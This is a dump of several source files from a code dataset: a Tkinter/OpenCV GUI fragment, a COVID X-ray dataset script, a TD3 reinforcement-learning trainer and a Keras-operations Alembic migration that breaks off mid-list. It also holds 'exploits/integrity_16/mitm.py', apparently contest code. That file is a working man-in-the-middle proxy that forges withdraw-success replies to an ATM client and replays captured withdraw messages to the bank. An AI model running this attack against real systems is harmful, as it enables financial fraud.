self.scalerChange)\r\n self.scale3.set(10)\r\n self.scale4 = tk.Scale(self.topFrame, from_=1, to=100, orient=HORIZONTAL, length=500, label='max line gap', command = self.scalerChange)\r\n self.scale4.set(50)\r\n #image panel\r\n self.panelA = tk.Label(self.bottomFrame, text = 'image here')\r\n \r\n\r\n\r\n def setup_layout(self):\r\n self.topFrame.pack(side = TOP)\r\n self.bottomFrame.pack (side=BOTTOM)\r\n self.topFrame2.pack(side = TOP)\r\n self.b1LoadImg.pack( side=LEFT)\r\n self.b2LineDetect.pack(side = RIGHT)\r\n self.scale4.pack(side=BOTTOM) #max line gap\r\n self.scale3.pack(side=BOTTOM) #min line lenght\r\n self.scale2.pack(side=BOTTOM) #threshold\r\n self.scale1.pack(side=BOTTOM) # pixel\r\n self.panelA.pack()\r\n\r\n \r\n def updateImg (self,img):\r\n self.panelA.configure(image=img)\r\n self.panelA.image = img\r\n return\r\n def scalerChange (self, val):\r\n if (self.flagLoadImage):\r\n pub.sendMessage(\"LineDetect_Button_Pressed\")\r\n def lineDetect(self):\r\n pub.sendMessage(\"LineDetect_Button_Pressed\")\r\n#test view\r\nif __name__ == \"__main__\":\r\n mainwin = tk.Tk()\r\n WIDTH = 800\r\n HEIGHT = 600\r\n mainwin.geometry(\"%sx%s\" % (WIDTH, HEIGHT))\r\n #mainwin.resizable(0, 0)\r\n mainwin.title(\"Open CV\")\r\n\r\n view=View(mainwin)\r\n view.setup()\r\n mainwin.mainloop()","sub_path":"hnzView.py","file_name":"hnzView.py","file_ext":"py","file_size_in_byte":3570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"103615286","text":"\"\"\"\nScript to prepare combined dataset\nClass 0: Normal\nClass 1: Bacterial Pneumonia\nClass 2: Viral Pneumonia\nClass 3: COVID-19\n\"\"\"\nimport glob\nimport os\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--combine_pneumonia\", action='store_true', default=False)\nparser.add_argument(\"--use_generated\", type=bool, default=False)\nargs = parser.parse_args()\n\nCOVID19_DATA_PATH = \"./data/covid19\"\nCOVID19_AR_DATA_PATH = \"./data/covid19_ar\"\nPNEUMONIA_DATA_PATH = \"./data/Data/chest-xray-pneumonia/chest_xray/\"\nGENERATED_DATA_PATH = \"./data/Data/covid-generated\"\nDATA_PATH = \"./data\"\n\n# Assert that the data directories are present\nfor d in [COVID19_DATA_PATH, COVID19_AR_DATA_PATH, PNEUMONIA_DATA_PATH, DATA_PATH]:\n try:\n assert os.path.isdir(d) \n except:\n print (\"Directory %s does not exists\" % d)\n\ndef create_list (split, use_generated=False):\n \n\n assert split in ['train', 'test', 'val']\n l = []\n\n # add generated images\n if ((use_generated==True) and (split=='train')):\n for f in glob.glob(os.path.join(GENERATED_DATA_PATH, 'genxray_*')):\n f = f.replace(\"\\\\\", \"/\")\n l.append((f, 3)) # Class 0\n\n # Prepare list using kaggle pneumonia dataset\n for f in glob.glob(os.path.join(PNEUMONIA_DATA_PATH, split, 'NORMAL', '*')):\n f = f.replace(\"\\\\\", \"/\")\n l.append((f, 0)) # Class 0\n\n for f in glob.glob(os.path.join(PNEUMONIA_DATA_PATH, split, 'PNEUMONIA', '*')):\n f = f.replace(\"\\\\\", \"/\")\n if args.combine_pneumonia:\n l.append((f, 1)) # Class 1\n else:\n if 'bacteria' in f:\n l.append((f, 1)) # Class 1\n else:\n l.append((f, 2)) # Class 2\n\n # Prepare list using covid dataset\n covid_file = os.path.join(COVID19_DATA_PATH, '%s_list.txt'%split)\n with open(covid_file, 'r') as cf:\n for f in cf.readlines():\n f = f.replace(\"\\n\", \"\")\n f = f.replace(\"\\\\\", \"/\")\n if args.combine_pneumonia:\n l.append((f, 2)) # Class 2\n else:\n l.append((f, 3)) # Class 3\n\n # Prepare list using covid AR dataset\n \n covid_ar_file = os.path.join(COVID19_AR_DATA_PATH, '%s_list.txt'%split)\n with open(covid_ar_file, 'r') as cf:\n for f in cf.readlines():\n f = f.replace(\"\\n\", \"\")\n f = f.replace(\"\\\\\", \"/\")\n if args.combine_pneumonia:\n l.append((f, 2)) # Class 2\n else:\n l.append((f, 3)) # Class 3\n\n if ((use_generated==True) and (split=='train')):\n write_file = 'train_generated.txt'\n else:\n write_file = '%s.txt'%split\n with open(os.path.join(DATA_PATH, write_file), 'w') as f:\n for item in l:\n f.write(\"%s %d\\n\" % item)\n\nfor split in ['train', 'test', 'val']:\n create_list(split, args.use_generated)\n","sub_path":"cnn_classifier/data_tools/prepare_data.py","file_name":"prepare_data.py","file_ext":"py","file_size_in_byte":2880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"410355382","text":"import pybullet_envs\r\nfrom gym import make\r\nfrom collections import deque\r\nimport numpy as np\r\nimport torch\r\nfrom torch import nn\r\nfrom torch.nn import functional as F\r\nfrom torch.optim import Adam\r\nimport random\r\nimport copy\r\nimport wandb\r\n\r\nGAMMA = 0.99\r\nTAU = 0.002\r\nCRITIC_LR = 5e-4\r\nACTOR_LR = 2e-4\r\nDEVICE = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\r\nBATCH_SIZE = 128\r\nENV_NAME = \"AntBulletEnv-v0\"\r\nTRANSITIONS = 1000000\r\nDELAY = 4\r\nPOLICY_NOISE = 0.05\r\nNOISE_CLIP = 0.2\r\nEPSILON = 0.1\r\nUSE_HUBER = True\r\n\r\nCONFIG = {\r\n key: value for key, value in locals().copy().items() if key.isupper() and not str(value).startswith(\" BATCH_SIZE * 16:\r\n self.total_it += 1\r\n log_dict = dict()\r\n # Sample batch\r\n transitions = [self.replay_buffer[random.randint(0, len(self.replay_buffer)-1)] for _ in range(BATCH_SIZE)]\r\n state, action, next_state, reward, done = zip(*transitions)\r\n state = torch.tensor(np.array(state), device=DEVICE, dtype=torch.float)\r\n action = torch.tensor(np.array(action), device=DEVICE, dtype=torch.float)\r\n next_state = torch.tensor(np.array(next_state), device=DEVICE, dtype=torch.float)\r\n reward = torch.tensor(np.array(reward), device=DEVICE, dtype=torch.float)\r\n done = torch.tensor(np.array(done), device=DEVICE, dtype=torch.float)\r\n \r\n # Update critic\r\n log_dict['critic'] = self.update_critic(state, action, reward, next_state, done)\r\n \r\n # Update actor\r\n if (self.total_it % DELAY) == 0:\r\n log_dict['actor'] = self.update_actor(state)\r\n\r\n soft_update(self.target_critic_1, self.critic_1)\r\n soft_update(self.target_critic_2, self.critic_2)\r\n soft_update(self.target_actor, self.actor)\r\n if wandb.run:\r\n wandb.log({'optim_step': self.total_it, **log_dict})\r\n\r\n def update_critic(self, state, action, reward, next_state, done):\r\n q_1 = self.critic_1(state, action)\r\n q_2 = self.critic_2(state, action)\r\n log_dict = dict()\r\n with torch.no_grad():\r\n next_action = self.target_actor(next_state)\r\n noise = (\r\n torch.randn_like(action) * POLICY_NOISE\r\n ).clamp(-NOISE_CLIP, NOISE_CLIP)\r\n next_action = (next_action + noise).clamp(-1, 1)\r\n\r\n next_q_1 = self.target_critic_1(next_state, next_action)\r\n next_q_2 = self.target_critic_2(next_state, next_action)\r\n\r\n target = torch.minimum(next_q_1, next_q_2) * GAMMA\r\n target = target * (1 - done)\r\n target += reward\r\n\r\n if USE_HUBER:\r\n critic_loss1 = F.smooth_l1_loss(q_1, target)\r\n critic_loss2 = F.smooth_l1_loss(q_2, target)\r\n else:\r\n critic_loss1 = F.mse_loss(q_1, target)\r\n critic_loss2 = F.mse_loss(q_2, target)\r\n log_dict['critic_loss1'] = critic_loss1.cpu().item()\r\n log_dict['critic_loss2'] = critic_loss2.cpu().item()\r\n\r\n log_dict['critic1_grad'] = self.update_nn(self.critic_1_optim, critic_loss1, self.critic_1)\r\n log_dict['critic2_grad'] = self.update_nn(self.critic_2_optim, critic_loss2, self.critic_2)\r\n return log_dict\r\n\r\n def update_actor(self, state):\r\n log_dict = dict()\r\n pred_action = self.actor(state)\r\n q_value = self.critic_1(state, pred_action)\r\n q_mean = -torch.mean(q_value)\r\n actor_loss = q_mean\r\n log_dict['actor_loss'] = actor_loss.cpu().item()\r\n\r\n log_dict['actor_grad'] = self.update_nn(self.actor_optim, actor_loss, self.actor)\r\n return log_dict\r\n\r\n @staticmethod\r\n def update_nn(optim, loss, model):\r\n optim.zero_grad()\r\n loss.backward()\r\n optim.step()\r\n\r\n total_norm = 0.0\r\n for p in model.parameters():\r\n param_norm = p.grad.detach().data.norm(2)\r\n total_norm += param_norm.item() ** 2\r\n total_norm = total_norm ** 0.5\r\n return total_norm\r\n\r\n def act(self, state):\r\n with torch.no_grad():\r\n state = torch.tensor(np.array([state]), dtype=torch.float, device=DEVICE)\r\n return self.actor(state).cpu().numpy()[0]\r\n\r\n def save(self, reward):\r\n torch.save(self.actor.state_dict(), f\"actor_{reward:.2f}.pkl\")\r\n torch.save(self.critic_1.state_dict(), f\"critic_{reward:.2f}.pkl\")\r\n\r\n def load(self, actor_path, critic_path):\r\n if actor_path:\r\n actor_weight = torch.load(actor_path, map_location=DEVICE)\r\n self.actor.load_state_dict(actor_weight)\r\n\r\n if critic_path:\r\n critic_weight = torch.load(critic_path, map_location=DEVICE)\r\n self.critic_1.load_state_dict(critic_weight)\r\n self.critic_2.load_state_dict(critic_weight)\r\n\r\n self.target_critic_1 = copy.deepcopy(self.critic_1)\r\n self.target_critic_2 = copy.deepcopy(self.critic_2)\r\n\r\n\r\ndef evaluate_policy(env, agent, episodes=5):\r\n returns = []\r\n for _ in range(episodes):\r\n done = False\r\n state = env.reset()\r\n total_reward = 0.\r\n \r\n while not done:\r\n state, reward, done, _ = env.step(agent.act(state))\r\n total_reward += reward\r\n returns.append(total_reward)\r\n return returns\r\n\r\n\r\nif __name__ == \"__main__\":\r\n try:\r\n wandb.init(\r\n entity='ermekaitygulov',\r\n anonymous='allow',\r\n project='RL-HW3',\r\n force=False,\r\n config=CONFIG\r\n )\r\n except wandb.errors.error.UsageError:\r\n pass\r\n env = make(ENV_NAME)\r\n test_env = make(ENV_NAME)\r\n td3 = TD3(state_dim=env.observation_space.shape[0], action_dim=env.action_space.shape[0])\r\n state = env.reset()\r\n\r\n episodes_sampled = 0\r\n steps_sampled = 0\r\n\r\n max_reward = -np.inf\r\n train_reward = 0\r\n\r\n for i in range(TRANSITIONS):\r\n steps = 0\r\n \r\n #Epsilon-greedy policy\r\n action = td3.act(state)\r\n action = np.clip(action + EPSILON * np.random.randn(*action.shape), -1, +1)\r\n\r\n next_state, reward, done, _ = env.step(action)\r\n td3.update((state, action, next_state, reward, done))\r\n\r\n state = next_state if not done else env.reset()\r\n train_reward += reward\r\n if done:\r\n wandb.log({'train_step': i + 1, 'train_reward': train_reward})\r\n train_reward = 0\r\n\r\n if (i + 1) % (TRANSITIONS//100) == 0:\r\n rewards = evaluate_policy(test_env, td3, 5)\r\n print(f\"Step: {i+1}, Reward mean: {np.mean(rewards)}, Reward std: {np.std(rewards)}\")\r\n wandb.log({'train_step': i + 1, 'val': np.mean(rewards)})\r\n if np.mean(rewards) > max_reward:\r\n td3.save(np.mean(rewards))\r\n max_reward = np.mean(rewards)\r\n\r\n","sub_path":"hw03_ant/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":8850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"556936990","text":"#!/usr/bin/env python2\nimport argparse\nimport signal\nimport socket\nimport sys\nimport threading\nimport time\nfrom contextlib import contextmanager\n\nimport requests\n\nrunning = True\nlocalSocket = None\n\nCLIENT2SERVER = 1\nSERVER2CLIENT = 2\n\nmessageCountClientServer = 0\nmessageCountServerClient = 0\n\nwithdrawSuccess = \"\"\nwithdrawSuccessAck = \"\"\nwithdraw = \"\"\nwithdrawEOF = \"\"\n\ndef printErr(str, file):\n print >> sys.stderr, str\n\ndef pre_mitm(buff, direction, client, server):\n message = str(buff)\n\n if message[-1] == \".\" and len(message) > 1:\n sliced = message[:len(message) - 1]\n mitm(sliced, direction, client, server)\n slice2 = \".\"\n mitm(slice2, direction, client, server)\n\n else:\n mitm(buff, direction, client, server)\n\n\ndef mitm(buff, direction, client, server):\n global messageCountClientServer, messageCountServerClient\n global withdrawSuccess, withdrawSuccessEOF, withdrawSuccessAck\n global withdraw, withdrawEOF\n\n out = {\"message\": buff, \"sendTo\": server}\n if direction == CLIENT2SERVER:\n messageCountClientServer += 1\n if messageCountClientServer == 9:\n printErr('Failing withdraw: ' + str(out[\"message\"]), file=sys.stderr)\n withdraw = out[\"message\"]\n out.clear()\n if messageCountClientServer == 10:\n printErr('Failing withdraw EOF: ' + str(out[\"message\"]), file=sys.stderr)\n withdrawEOF = out[\"message\"]\n printErr('Send \"success\" to client: ' + str(withdrawSuccess), file=sys.stderr)\n client.send(withdrawSuccess)\n printErr('Send \"success EOF\" to client: ' + str(withdrawSuccessEOF), file=sys.stderr)\n client.send(withdrawSuccessEOF)\n out.clear()\n if messageCountClientServer == 11:\n printErr('Withdraw ACK: ' + str(out[\"message\"]))\n withdrawSuccessAck = out[\"message\"]\n out.clear()\n \n if messageCountClientServer == 12:\n printErr('Withdraw ACK_EOF: ' + str(out[\"message\"]), file=sys.stderr)\n withdrawSuccessAck = withdrawSuccessAck + out[\"message\"]\n printErr('Withdraw concatenated: ' + str(withdrawSuccessAck), file=sys.stderr)\n out.clear()\n\n elif direction == SERVER2CLIENT:\n messageCountServerClient += 1\n printErr('s2c - ' + str(messageCountServerClient) + ' :' + str(out[\"message\"]), file=sys.stderr)\n if messageCountServerClient == 3:\n printErr('Withdraw success: ' + str(out[\"message\"]), file=sys.stderr)\n withdrawSuccess = out[\"message\"]\n if messageCountServerClient == 4:\n printErr('Withdraw EOF: ' + str(out[\"message\"]), file=sys.stderr)\n withdrawSuccessEOF = out[\"message\"]\n\n if out and out[\"sendTo\"] is not None:\n if direction == CLIENT2SERVER:\n if out[\"sendTo\"] is client:\n printErr('Send from atm to atm: ' + str(out[\"message\"]), file=sys.stderr)\n else:\n printErr('Send from atm to bank: ' + str(out[\"message\"]), file=sys.stderr)\n elif direction == SERVER2CLIENT:\n if out[\"sendTo\"] is client:\n printErr('Send from bank to bank: ' + str(out[\"message\"]), file=sys.stderr)\n else:\n printErr('Send from bank to atm: ' + str(out[\"message\"]), file=sys.stderr)\n\n out[\"sendTo\"].send(out[\"message\"])\n\n return\n\n\n@contextmanager\ndef ignored(*exceptions):\n try:\n yield\n except exceptions:\n pass\n\n\ndef killpn(a, b, n):\n if n != CLIENT2SERVER:\n killp(a, b)\n\n\ndef killp(a, b):\n global messageCountClientServer, messageCountServerClient\n with ignored(Exception):\n a.shutdown(socket.SHUT_RDWR)\n a.close()\n b.shutdown(socket.SHUT_RDWR)\n b.close()\n return\n\n\ndef worker(client, server, n):\n while running:\n b = \"\"\n with ignored(Exception):\n b = client.recv(1024)\n if len(b) == 0:\n killpn(client, server, n)\n return\n try:\n pre_mitm(b, n, client, server)\n except:\n printErr(str.format(\"Unexpected error: {0}\", sys.exc_info()[0]), file=sys.stderr)\n killpn(client, server, n)\n return\n killp(client, server)\n return\n\n\ndef send_get_balance_to_command_server(command_server_host, command_server_port):\n printErr(str.format(\"Send -g command to {0}:{1}\", command_server_host, str(command_server_port)), file=sys.stderr)\n try:\n requests.post(\"http://\" + command_server_host + \":\" + str(command_server_port),\n data={\"REQUEST\": '{\"type\": \"input\",'\n '\"input\":{' +\n '\"input\": [\"-p\",\"%PORT%\",\"-i\",\"%IP%\",\"-a\",\"ted\",\"-g\"]}' +\n '}'})\n except:\n printErr(\"Unable to reach command server.\", file=sys.stderr)\n return\n\n\ndef send_done_to_command_server(command_server_host, command_server_port):\n time.sleep(30)\n printErr(str.format(\"Send done to {0}:{1}\", command_server_host, str(command_server_port)), file=sys.stderr)\n try:\n printErr(\"http://\" + command_server_host + \":\" + str(command_server_port), file=sys.stderr)\n response = requests.post(\"http://\" + command_server_host + \":\" + str(command_server_port),\n data={\"REQUEST\": '{\"type\": \"done\"}'})\n printErr(\"Response from command is: \" +str(response), file=sys.stderr)\n except:\n printErr(\"Unable to reach command server.\", file=sys.stderr)\n return\n\n\ndef replay_attack_and_finalize(bank_host, bank_port, command_host, command_port):\n global withdraw, withdrawEOF, withdrawSuccessAck\n\n bank = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n bank.connect((bank_host, bank_port))\n printErr('Sent fake withdraw to bank: ' + str(withdraw), file=sys.stderr)\n bank.send(withdraw)\n printErr('Sent fake withdraw EOF to bank: ' + str(withdrawEOF), file=sys.stderr)\n bank.send(withdrawEOF)\n\n try:\n b = bank.recv(1024)\n printErr('Success of spoofed withdraw: ' + str(b), file=sys.stderr)\n b = bank.recv(1024)\n printErr('Success of spoofed withdraw EOF: ' + str(b), file=sys.stderr)\n\n bank.shutdown(socket.SHUT_RDWR)\n bank.close()\n\n bank = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n bank.connect((bank_host, bank_port))\n bank.sendall(withdrawSuccessAck)\n except:\n printErr(str.format(\"Unexpected error: {0}\", sys.exc_info()[0]), file=sys.stderr)\n bank.shutdown(socket.SHUT_RDWR)\n bank.close()\n return\n bank.shutdown(socket.SHUT_RDWR)\n bank.close()\n\n send_get_balance_to_command_server(command_host, command_port)\n return\n\n\ndef signalhandler(sn, sf):\n global running, localSocket\n running = False\n localSocket.shutdown(socket.SHUT_RDWR)\n localSocket.close()\n\n\ndef doProxyMain(port, remotehost, remoteport, command_server_host, command_server_port):\n global messageCountClientServer, messageCountServerClient\n global localSocket\n\n signal.signal(signal.SIGTERM, signalhandler)\n\n message_counter = 0\n workers = []\n\n try:\n localSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n localSocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n localSocket.bind((\"0.0.0.0\", port))\n localSocket.listen(1)\n\n while message_counter < 4:\n message_counter += 1\n\n k, a = localSocket.accept()\n v = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n v.connect((remotehost, remoteport))\n printErr(str.format(\"Starting threads for message {2}: s2c: {0} | c2s {1}\",\n messageCountServerClient, messageCountClientServer, message_counter), file=sys.stderr)\n t1 = threading.Thread(target=worker, args=(k, v, CLIENT2SERVER))\n t2 = threading.Thread(target=worker, args=(v, k, SERVER2CLIENT))\n t2.start()\n t1.start()\n workers.append((t1, t2, k, v))\n\n while message_counter < 6:\n message_counter += 1\n\n k, a = localSocket.accept()\n t1 = threading.Thread(target=worker, args=(k, None, CLIENT2SERVER))\n t1.start()\n workers.append((t1, None, k, None))\n\n while message_counter < 8:\n message_counter += 1\n\n k, a = localSocket.accept()\n v = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n v.connect((remotehost, remoteport))\n printErr(str.format(\"Starting threads for message {2}: s2c: {0} | c2s {1}\",\n messageCountServerClient, messageCountClientServer, message_counter), file=sys.stderr)\n t1 = threading.Thread(target=worker, args=(k, v, CLIENT2SERVER))\n t2 = threading.Thread(target=worker, args=(v, k, SERVER2CLIENT))\n t2.start()\n t1.start()\n workers.append((t1, t2, k, v))\n\n \n threading.Thread(target=replay_attack_and_finalize,\n args=(remotehost, remoteport, command_server_host, command_server_port)).start()\n\n threading.Thread(target=send_done_to_command_server, args=(command_server_host, command_server_port)).start()\n\n while running is True:\n k, a = localSocket.accept()\n v = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n v.connect((remotehost, remoteport))\n printErr(str.format(\"Starting threads for message {2}: s2c: {0} | c2s {1}\",\n messageCountServerClient, messageCountClientServer, message_counter), file=sys.stderr)\n t1 = threading.Thread(target=worker, args=(k, v, CLIENT2SERVER))\n t2 = threading.Thread(target=worker, args=(v, k, SERVER2CLIENT))\n t2.start()\n t1.start()\n workers.append((t1, t2, k, v))\n\n except KeyboardInterrupt:\n signalhandler(None, None)\n except:\n printErr(str.format(\"Unexpected error: {0}\", sys.exc_info()[0]), file=sys.stderr)\n pass\n\n for t1, t2, k, v in workers:\n killp(k, v)\n if t1 is not None:\n t1.join()\n if t2 is not None:\n t2.join()\n return\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Proxy')\n parser.add_argument('-p', type=int, default=4000, help=\"listen port\")\n parser.add_argument('-s', type=str, default=\"127.0.0.1\", help=\"server ip address\")\n parser.add_argument('-q', type=int, default=3000, help=\"server port\")\n parser.add_argument('-c', type=str, default=\"127.0.0.1\", help=\"command server\")\n parser.add_argument('-d', type=int, default=5000, help=\"command port\")\n args = parser.parse_args()\n print('started\\n')\n sys.stdout.flush()\n doProxyMain(args.p, args.s, args.q, args.c, args.d)\n","sub_path":"exploits/integrity_16/mitm.py","file_name":"mitm.py","file_ext":"py","file_size_in_byte":10932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"621274681","text":"# -*- coding: utf-8 -*-\n\"\"\"Add keras input and output layers\n\nRevision ID: 8647edf5eaad\nRevises: 73f22f178b14\nCreate Date: 2018-10-16 14:11:56.645275\n\n\"\"\"\nfrom alembic import context\nfrom alembic import op\nfrom sqlalchemy import String, Integer, Text\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy.sql import table, column, text\nimport json\n\n\n# revision identifiers, used by Alembic.\nrevision = '8647edf5eaad'\ndown_revision = '73f22f178b14'\nbranch_labels = None\ndepends_on = None\n\nKERAS_PLATAFORM_ID = 5\n\n\ndef _insert_operation_category_translation():\n tb = table(\n 'operation_category_translation',\n column('id', Integer),\n column('locale', String),\n column('name', String))\n\n columns = ('id', 'locale', 'name')\n data = [\n (5070, \"en\", 'Input/Output Layers'),\n ]\n rows = [dict(list(zip(columns, row))) for row in data]\n\n op.bulk_insert(tb, rows)\n\n\ndef _insert_operation_platform():\n tb = table(\n 'operation_platform',\n column('operation_id', Integer),\n column('platform_id', Integer), )\n\n columns = ('operation_id', 'platform_id')\n data = [\n (5071, KERAS_PLATAFORM_ID),#Input\n (5072, KERAS_PLATAFORM_ID),#Output\n ]\n rows = [dict(list(zip(columns, row))) for row in data]\n op.bulk_insert(tb, rows)\n\n\ndef _insert_operation_category():\n tb = table(\n 'operation_category',\n column('id', Integer),\n column('type', String),\n column('order', Integer),\n column('default_order', Integer),\n )\n\n columns = ('id', 'type', 'order', 'default_order')\n data = [\n (5070, \"group\", 7, 7),\n (5071, \"subgroup\", 1, 1),\n (5072, \"subgroup\", 2, 2),\n ]\n rows = [dict(list(zip(columns, row))) for row in data]\n\n op.bulk_insert(tb, rows)\n\n\ndef _insert_operation():\n tb = table(\n 'operation',\n column('id', Integer),\n column('slug', String),\n column('enabled', Integer),\n column('type', String),\n column('icon', Integer),)\n\n columns = ('id', 'slug', 'enabled', 'type', 'icon')\n data = [\n (5071, \"input\", 1, 'ACTION', ''),\n (5072, \"output\", 1, 'ACTION', ''),\n ]\n rows = [dict(list(zip(columns, row))) for row in data]\n\n op.bulk_insert(tb, rows)\n\n\ndef _insert_operation_category_operation():\n tb = table(\n 'operation_category_operation',\n column('operation_id', Integer),\n column('operation_category_id', Integer))\n\n columns = ('operation_category_id', 'operation_id')\n data = [\n (5070, 5071),\n (5070, 5072),\n ]\n rows = [dict(list(zip(columns, row))) for row in data]\n\n op.bulk_insert(tb, rows)\n\n\ndef _insert_operation_translation():\n tb = table(\n 'operation_translation',\n column('id', Integer),\n column('locale', String),\n column('name', String),\n column('description', String))\n\n columns = ('id', 'locale', 'name', 'description')\n data = [\n (5071, \"en\", \"Input\", ''),\n (5072, \"en\", \"Output\", ''),\n ]\n rows = [dict(list(zip(columns, row))) for row in data]\n\n op.bulk_insert(tb, rows)\n\n\ndef _insert_operation_port():\n tb = table(\n 'operation_port',\n column('id', Integer),\n column('type', String),\n column('tags', String),\n column('order', Integer),\n column('multiplicity', String),\n column('operation_id', Integer),\n column('slug', String),)\n\n columns = ('id', 'type', 'tags', 'order', 'multiplicity', 'operation_id', 'slug')\n data = [\n #Input\n (5271, 'OUTPUT', '', 1, 'ONE', 5071, 'output data'),\n #Output\n (5172, 'INPUT', '', 1, 'ONE', 5072, 'input data'),\n ]\n rows = [dict(list(zip(columns, row))) for row in data]\n\n op.bulk_insert(tb, rows)\n\n\ndef _insert_operation_port_interface_operation_port():\n tb = table(\n 'operation_port_interface_operation_port',\n column('operation_port_id', Integer),\n column('operation_port_interface_id', Integer))\n\n columns = ('operation_port_id', 'operation_port_interface_id')\n data = [\n #input\n (5271, 1),\n #Output\n (5172, 1),\n ]\n rows = [dict(list(zip(columns, row))) for row in data]\n\n op.bulk_insert(tb, rows)\n\n\ndef _insert_operation_port_translation():\n tb = table(\n 'operation_port_translation',\n column('id', Integer),\n column('locale', String),\n column('name', String),\n column('description', String))\n\n columns = ('id', 'locale', 'name', 'description')\n data = [\n (5271, \"en\", 'output data', 'Output data'),\n (5172, \"en\", 'input data', 'Input data'),\n ]\n rows = [dict(list(zip(columns, row))) for row in data]\n\n op.bulk_insert(tb, rows)\n\n\ndef _insert_operation_form():\n operation_form_table = table(\n 'operation_form',\n column('id', Integer),\n column('enabled', Integer),\n column('order', Integer),\n column('category', String), )\n\n columns = ('id', 'enabled', 'order', 'category')\n data = [\n #Input\n (5171, 1, 1, 'execution'),\n (5172, 1, 2, 'execution'),\n (5173, 1, 3, 'execution'),\n (5174, 1, 4, 'execution'),\n (5175, 1, 5, 'execution'),\n (5176, 1, 6, 'execution'),\n (5177, 1, 6, 'execution'),\n ]\n\n rows = [dict(list(zip(columns, row))) for row in data]\n op.bulk_insert(operation_form_table, rows)\n\n\ndef _insert_operation_form_translation():\n tb = table(\n 'operation_form_translation',\n column('id', Integer),\n column('locale', String),\n column('name', String))\n\n columns = ('id', 'locale', 'name')\n data = [\n #Input\n (5171, 'en', 'Execution'),\n (5171, 'pt', 'Execução'),\n (5172, 'en', 'Execution'),\n (5172, 'pt', 'Execução'),\n (5173, 'en', 'Execution'),\n (5173, 'pt', 'Execução'),\n (5174, 'en', 'Execution'),\n (5174, 'pt', 'Execução'),\n (5175, 'en', 'Execution'),\n (5175, 'pt', 'Execução'),\n (5176, 'en', 'Execution'),\n (5176, 'pt', 'Execução'),\n (5177, 'en', 'Execution'),\n (5177, 'pt', 'Execução'),\n ]\n rows = [dict(list(zip(columns, row))) for row in data]\n op.bulk_insert(tb, rows)\n\n\ndef _insert_operation_operation_form():\n tb = table(\n 'operation_operation_form',\n column('operation_id', Integer),\n column('operation_form_id', Integer))\n\n columns = ('operation_id', 'operation_form_id')\n data = [\n #Input\n (5071, 5171), # own execution form\n (5071, 5172), # own execution form\n (5071, 5173), # own execution form\n (5071, 5174), # own execution form\n (5071, 5175), # own execution form\n (5071, 5176), # own execution form\n (5071, 5177), # own execution form\n (5071, 41), #appearance\n (5072, 41), #appearance\n ]\n\n rows = [dict(list(zip(columns, row))) for row in data]\n op.bulk_insert(tb, rows)\n\n\ndef _insert_operation_form_field():\n tb = table(\n 'operation_form_field',\n column('id', Integer),\n column('name', String),\n column('type', String),\n column('required', Integer),\n column('order', Integer),\n column('default', Text),\n column('suggested_widget', String),\n column('values_url', String),\n column('values', String),\n column('scope', String),\n column('form_id', Integer), )\n\n columns = ('id', 'name', 'type', 'required', 'order', 'default',\n 'suggested_widget', 'values_url', 'values', 'scope', 'form_id')\n data = [\n #Dataset\n (5171, 'dataset', 'TEXT', 1, 1, None, 'text', None, None, 'EXECUTION', 5171),\n #Train/Validation/test split\n (5172, 'train_validation_test_split', 'TEXT', 0, 2, '60%-20%-20%', 'text', None, None, 'EXECUTION', 5172),\n #K-fold cross validation\n (5173, 'use_k_fold_cross_validation', 'INTEGER', 0, 3, None, 'checkbox', None, None, 'EXECUTION', 5173),\n #Train/Validation/test split\n (5174, 'percent_of_train_data', 'INTEGER', 0, 4, None, 'integer', None, None, 'EXECUTION', 5174),\n #Shuffle data\n (5175, 'shuffle_data', 'INTEGER', 0, 5, None, 'checkbox', None, None, 'EXECUTION', 5175),\n (5176, 'load_dataset_in_memory', 'TEXT', 0, 6, 'one batch at a time', 'dropdown', None,\n json.dumps([\n {\"key\": \"one batch at a time\", \"value\": \"one batch at a time\"},\n {\"key\": \"full dataset\", \"value\": \"full dataset\"},\n ]),\n 'EXECUTION', 5176),\n (5177, 'seed', 'INTEGER', 0, 7, 17, 'integer', None, None, 'EXECUTION', 5177),\n ]\n rows = [dict(list(zip(columns, row))) for row in data]\n op.bulk_insert(tb, rows)\n\n\ndef _insert_operation_form_field_translation():\n tb = table(\n 'operation_form_field_translation',\n column('id', Integer),\n column('locale', String),\n column('label', String),\n column('help', String), )\n\n columns = ('id', 'locale', 'label', 'help')\n data = [\n (5171, 'en', 'Dataset', 'Path for the dataset.'),\n (5172, 'en', 'Train-Validation-Test split', 'Percentage for Train, '\n 'Validation and Test to split the data automatically. '\n 'The sum of them needs to be equal to 100.'),\n (5173, 'en', 'Use K-fold cross validation', 'The dataset will be split in different k-fold train and test.'),\n (5174, 'en', '% of train data', 'Percentage of training data to compose '\n 'the each fold for the cross validation. '\n 'The test data is 100 - (% of train).'),\n (5175, 'en', 'Shuffle data', 'Shuffle the instances in the dataset to ensure a random learning space.'),\n (5176, 'en', 'Load dataset in memory', 'Load the dataset in memory in two ways. '\n '1- Full dataset in memory (recommended for small dataset). '\n '2- One batch at time (recommended for large dataset).'),\n (5177, 'en', 'Seed', 'Fix random seed for reproducibility.'),\n ]\n rows = [dict(list(zip(columns, row))) for row in data]\n op.bulk_insert(tb, rows)\n\n\nall_commands = [\n (_insert_operation,\n 'DELETE FROM operation WHERE id BETWEEN 5071 AND 5072'),\n (_insert_operation_category,\n 'DELETE FROM operation_category WHERE id BETWEEN 5070 AND 5072'),\n (_insert_operation_translation,\n 'DELETE FROM operation_translation WHERE id BETWEEN 5071 AND 5072'),\n 